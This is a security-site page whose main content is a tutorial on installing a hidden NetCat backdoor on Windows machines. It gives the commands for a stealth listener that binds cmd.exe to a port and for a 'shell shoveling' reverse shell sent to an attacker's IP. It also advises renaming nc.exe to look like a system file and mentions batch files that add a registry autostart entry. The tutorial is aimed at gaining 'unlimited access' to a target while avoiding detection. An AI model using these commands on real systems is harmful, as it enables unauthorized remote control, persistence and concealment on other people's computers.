GulfTech Computers - Professional Computer Services  
Additional Links
-> Dicussion Forum
-> Encryption Tools
-> Information Tools
-> Net Info Tools
-> Latest Advisories
-> Latest Vulns
-> Latest Win Software
-> Latest Nix Software
-> Security News
-> Security Press
Recent News

GulfTech Computers strives to beat the price(s) of any other business around. Check with us first as it just may save you some time and money. And who doesn't want to save money? Please contact us with any questions or inquiries.

Latest GulfTech Releases

SubScan v1.2 Scans a domain for DNS records and SubDomains. Very stealthy, and can be used to find many hosts not on the public netblock. A very interesting tool to say the least. Works on both Nix and Windows based systems. Get it now!

Download SubScan v1.2

Search GulfTech
You can use the form below to search our site. Just enter the keyword or keywords to search.
Latest Advisories
SCO Security Advisory - OpenServer 5.0.6 OpenServer 5.0.7 : uudecode does not check for symlink or pipe (SCOSA-2004.7)
SCO Security Advisory - OpenServer 5.0.6 OpenServer 5.0.7 : OpenSSL Multiple Vulnerabilities (SCOSA-2004.10)
SCO Security Advisory - OpenServer 5.0.6 OpenServer 5.0.7 : Xsco contains a buffer overflow that could be exploited to gain root privileges (SCOSA-2004.3)
SCO Security Advisory - UnixWare 7.1.3 Open UNIX 8.0.0 : Xsco contains a buffer overflow that could be exploited to gain root privileges. (SCOSA-2004.2)
Microsoft Security Bulletin Re-release, August 2004
Latest Vulnerabilities
OpenFTPD Format String Vulnerability
Fusion News Unauthorized Account Addition Vulnerability
Jaws 0.4 Authentication Bypass Vulnerability
DansGuardian Hex Encoding URL Banned Extension Filter Bypass Vulnerability
LostBook v1.1 Javascript Execution Vulnerability
Latest Security News
Anti-spam spamvertisers agree to quit
Black Hat day 2 sounds security alarm
VPNs (Virtual Private Nightmares)
HNS Newsletter issue 224 has been released
Long-awaited IE patch (finally) arrives

Remote Shells Using NetCat

Today I am going to explain how to set up a backdoor on a WindowsNT/2K/XP machine using a program that I hope you are already familiar with called NetCat. NetCat is a VERY versatile tool and is reffered to by some as the "TCP/IP Swiss Army Knife" due to it's wide variety of uses and functions. Most, if not all security enthusiasts have NetCat in thier tool kit. It is available on both Windows and Nix platforms and can be downloaded from here. NetCat can be configured to listen on a certain port on a local machine, and launch a file (or in this case a remote shell) when a remote system connects to it. Below is the syntax for setting NetCat to listen in stealth mode on a local machine using cmd.exe (The Windows NT command interpreter) on port 1000.

C:\WINDOWS\system32> nc -L -d -e cmd.exe -p 1000

It should be obvious that cmd.exe has to be in the same directory as NetCat in order to issue the command listed above, but in case you were unclear of that, I hope that I have made that clear now. cmd.exe is located in the system32 directory, and NetCat is harder to spot at a glance in the system directory due to the large number of files there. But for added stealth you can rename nc.exe to something like rundllcmd.exe That way, someone will not be as quick to delete it if it is spotted. However if you do that you must change the above command to coincide with your new file name. For example, changing the nc in the command to rundllcmd. Now I am going to explain what the switches in the above command do exactly, to help you better understand how this process works.

-L : This makes the listener persistent across multiple connection breaks
-d : This runs NetCat in stealth mode with no interactive console
-e : This specifies the file to launch
-p : This specifies the port which NetCat listens on

After being issued, the command will allow any attacker access to the system by returning a remote command shell when the attacker attempts to connect to the port specified (in this case port 1000) Now I will show you how to connect to this remote machine that we have set the NetCat listener on. The command below is what we will be using to connect to the system. We will assume the IP address 192.168.0.192 is the IP of the machine that we set the NetCat listener on.

C:\WINDOWS\system32> nc 192.168.0.192 1000

If done correctly you should now have unlimited access to the remote machine. The sky is the limit with NetCat. It can be used for mass scans, bypassing firewalls, and sooooo much more. Also, if you know that NetCat is available on a system, or can be uploaded to the system behind a firewall you can use a similar method as the one above to gain a remote command shell. This is called "Shell Shoveling" and when executed sends a command shell back to you. Lets assume that your IP address is 192.168.0.1 and you have set up NetCat to listen on ports 1080 and 8888 (1080 for inbound and 8888 for outbound) on your machine. Now when the following command is executed on the machine you wish to gain access to, you will be returned a remote command shell on your machine, from the machine that you wish that you wish to gain access to.

C:\WINDOWS\system32> nc 192.168.0.1 1080 | cmd.exe | nc 192.168.0.1 8888

Having the commands we have talked about executed on the machine you wish to gain access to is only limited by your imagination and ability to be creative. I have included two batch files that can be edited and used to very discreetly execute the commands on a target system, as well as discreetly add a registry entry that starts the listener each time the system is started up. I plan to discuss other uses and techniques of NetCat in future docs. Thanks for reading.

Example 1 | Example 2

JeiAr




© Copyright 2002 - GulfTech Computers, All Rights Reserved
Contact GulfTech Computers